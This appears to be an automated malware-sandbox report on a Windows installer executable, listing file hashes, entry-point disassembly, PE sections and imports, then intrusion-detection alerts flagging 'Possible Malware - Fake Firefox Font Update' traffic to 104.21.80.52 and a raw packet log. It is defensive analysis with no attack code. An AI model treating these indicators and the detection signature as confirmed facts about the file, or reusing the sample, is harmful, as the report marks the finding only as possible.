                                                                                                                                                                  SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
                                                                                                                                                                  SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
                                                                                                                                                                  SHA512:de2156ba0bd71f3cd30bd9c2bbed9e1a4417c747252bb0c3205097b6a6ff45dfe5c4dd94650efbe635d5bd821172756f261dab42b998c7e4cd158e206f678bbd
                                                                                                                                                                  SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXj2:sRcqetYMe6dgB4QoxwgD/j2
                                                                                                                                                                  TLSH:22F63332A534403AE7F50577EE29A2347E78E320575189BBE2D4FD0A6DB4489A7F3213
                                                                                                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                  Entrypoint:0x42e2a6
                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                  Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                  OS Version Minor:1
                                                                                                                                                                  File Version Major:5
                                                                                                                                                                  File Version Minor:1
                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                  Subsystem Version Minor:1
                                                                                                                                                                  Import Hash:d7e2fd259780271687ffca462b9e69b7
                                                                                                                                                                  Instruction
                                                                                                                                                                  call 00007FBDC8CFE7DFh
                                                                                                                                                                  jmp 00007FBDC8CFE153h
                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                  mov ecx, dword ptr [esp+10h]
                                                                                                                                                                  or ecx, eax
                                                                                                                                                                  mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                  jne 00007FBDC8CFE2CBh
                                                                                                                                                                  mov eax, dword ptr [esp+04h]
                                                                                                                                                                  mul ecx
                                                                                                                                                                  retn 0010h
                                                                                                                                                                  push ebx
                                                                                                                                                                  mul ecx
                                                                                                                                                                  mov ebx, eax
                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                  mul dword ptr [esp+14h]
                                                                                                                                                                  add ebx, eax
                                                                                                                                                                  mov eax, dword ptr [esp+08h]
                                                                                                                                                                  mul ecx
                                                                                                                                                                  add edx, ebx
                                                                                                                                                                  pop ebx
                                                                                                                                                                  retn 0010h
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  int3
                                                                                                                                                                  cmp cl, 00000040h
                                                                                                                                                                  jnc 00007FBDC8CFE2D7h
                                                                                                                                                                  cmp cl, 00000020h
                                                                                                                                                                  jnc 00007FBDC8CFE2C8h
                                                                                                                                                                  shrd eax, edx, cl
                                                                                                                                                                  shr edx, cl
                                                                                                                                                                  ret
                                                                                                                                                                  mov eax, edx
                                                                                                                                                                  xor edx, edx
                                                                                                                                                                  and cl, 0000001Fh
                                                                                                                                                                  shr eax, cl
                                                                                                                                                                  ret
                                                                                                                                                                  xor eax, eax
                                                                                                                                                                  xor edx, edx
                                                                                                                                                                  ret
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  jmp 00007FBDC8CFE2CFh
                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                  call 00007FBDC8D04B4Ch
                                                                                                                                                                  pop ecx
                                                                                                                                                                  test eax, eax
                                                                                                                                                                  je 00007FBDC8CFE2D1h
                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                  call 00007FBDC8D04BD5h
                                                                                                                                                                  pop ecx
                                                                                                                                                                  test eax, eax
                                                                                                                                                                  je 00007FBDC8CFE2A8h
                                                                                                                                                                  pop ebp
                                                                                                                                                                  ret
                                                                                                                                                                  cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                                  je 00007FBDC8CFEB64h
                                                                                                                                                                  jmp 00007FBDC8CFEB41h
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                                                                  call 00007FBDC8CFEB7Dh
                                                                                                                                                                  pop ecx
                                                                                                                                                                  pop ebp
                                                                                                                                                                  ret
                                                                                                                                                                  push ebp
                                                                                                                                                                  mov ebp, esp
                                                                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                  push esi
                                                                                                                                                                  mov esi, ecx
                                                                                                                                                                  mov dword ptr [esi], 00460DB8h
                                                                                                                                                                  je 00007FBDC8CFE2CCh
                                                                                                                                                                  push 0000000Ch
                                                                                                                                                                  push esi
                                                                                                                                                                  call 00007FBDC8CFE29Dh
                                                                                                                                                                  pop ecx
                                                                                                                                                                  pop ecx
                                                                                                                                                                  mov eax, esi
                                                                                                                                                                  pop esi
                                                                                                                                                                  pop ebp
                                                                                                                                                                  Programming Language:
                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x686b4 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6d000 | 0x3a24 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x3dfc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x67650 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x676a4 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x67030 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x4b000 | 0x3e0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x68234 | 0x100 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x49937 | 0x49a00 | 2319c0baa707bb66cc0bc08c55a13d8c | False | 0.5314688561120543 | data | 6.570006046413636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x4b000 | 0x1ed60 | 0x1ee00 | 8ad6c4e18165c6d8ccdc97bab683438d | False | 0.3136386639676113 | data | 5.114228301263695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x6a000 | 0x1730 | 0xa00 | 00fde973df27dc2d36084e16d6dddbdf | False | 0.274609375 | firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600 | 3.1526594027632213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .wixburn | 0x6c000 | 0x38 | 0x200 | e9ca1c09062508c3b92e35754e60f8d0 | False | 0.107421875 | data | 0.5734966016060967 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x6d000 | 0x3a24 | 0x3c00 | 88921ee6f52b1477449352c993b3919c | False | 0.3304036458333333 | data | 5.550645858532838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x71000 | 0x3dfc | 0x3e00 | dd2c47fa48872886af4c9a2e5bd90ccc | False | 0.8097278225806451 | data | 6.794335469567533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x6d178 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.43185920577617326 |
| RT_MESSAGETABLE | 0x6da20 | 0x2840 | data | English | United States | 0.28823757763975155 |
| RT_GROUP_ICON | 0x70260 | 0x14 | data | English | United States | 1.15 |
| RT_VERSION | 0x70274 | 0x2dc | data | English | United States | 0.4781420765027322 |
| RT_MANIFEST | 0x70550 | 0x4d2 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators | English | United States | 0.47568881685575365 |

| DLL | Import |
|---|---|
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW |
| USER32.dll | PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW |
| OLEAUT32.dll | VariantInit, SysAllocString, VariantClear, SysFreeString |
| GDI32.dll | DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC |
| SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW |
| ole32.dll | CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity |
| KERNEL32.dll | GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA |
| RPCRT4.dll | UuidCreate |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-06T23:17:48.719723+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49850 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:17:50.082367+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49861 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:17:51.375110+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49872 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:10.796365+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50061 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:12.862362+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50073 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:21.925120+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50111 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:23.353479+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50112 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:24.479914+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50113 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:25.469662+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50114 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:27.736640+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50115 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:29.468954+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50116 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:30.654869+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50117 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:42.932749+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50118 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:44.191071+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50119 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:45.270575+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50120 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:46.127606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50121 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:48.265713+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50122 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:50.519130+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50123 | 104.21.80.52 | 443 | TCP |
| 2025-01-06T23:18:51.816735+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 50124 | 104.21.80.52 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                  Jan 6, 2025 23:17:49.465032101 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.465085030 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.465114117 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.465142012 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.465150118 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.465157986 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.465178013 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.467541933 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.467570066 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.467636108 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.467648029 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.467689037 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.539589882 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.547576904 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.547612906 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.547640085 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.547660112 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.547669888 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.547856092 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.549316883 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.549488068 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.549541950 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.549551010 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.549591064 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.549604893 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.549660921 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.549887896 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.549940109 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.549945116 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.549976110 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.550071955 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.550093889 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.550111055 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.550120115 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.550128937 CET49850443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.550132036 CET44349850104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.622512102 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.622539043 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:49.622632980 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.622900009 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:49.622914076 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.082299948 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.082366943 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.083782911 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.083789110 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.083996058 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.084796906 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.084829092 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.084834099 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.419236898 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.419328928 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.419405937 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.419769049 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.419787884 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.419800997 CET49861443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.419806004 CET44349861104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.904587030 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.904624939 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:50.904694080 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.908381939 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:50.908395052 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.375011921 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.375109911 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.376297951 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.376305103 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.376539946 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.377326965 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.377348900 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.377388954 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.930685043 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.930746078 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.930900097 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.930949926 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.930969954 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.930969954 CET49872443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:17:51.930978060 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:17:51.930984974 CET44349872104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.070033073 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.070056915 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.070210934 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.071078062 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.071090937 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.614569902 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:00.614588022 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.614792109 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:00.615120888 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:00.615133047 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.796834946 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.831960917 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.832005024 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.832423925 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.832437992 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.832483053 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.832493067 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.833658934 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.833667040 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.841480970 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.841546059 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.843013048 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:00.843022108 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:00.915581942 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.064029932 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.064078093 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.064268112 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.064285994 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.067004919 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.069484949 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.069493055 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.073630095 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.073693991 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.073700905 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.080040932 CET44349928142.250.185.65192.168.2.4
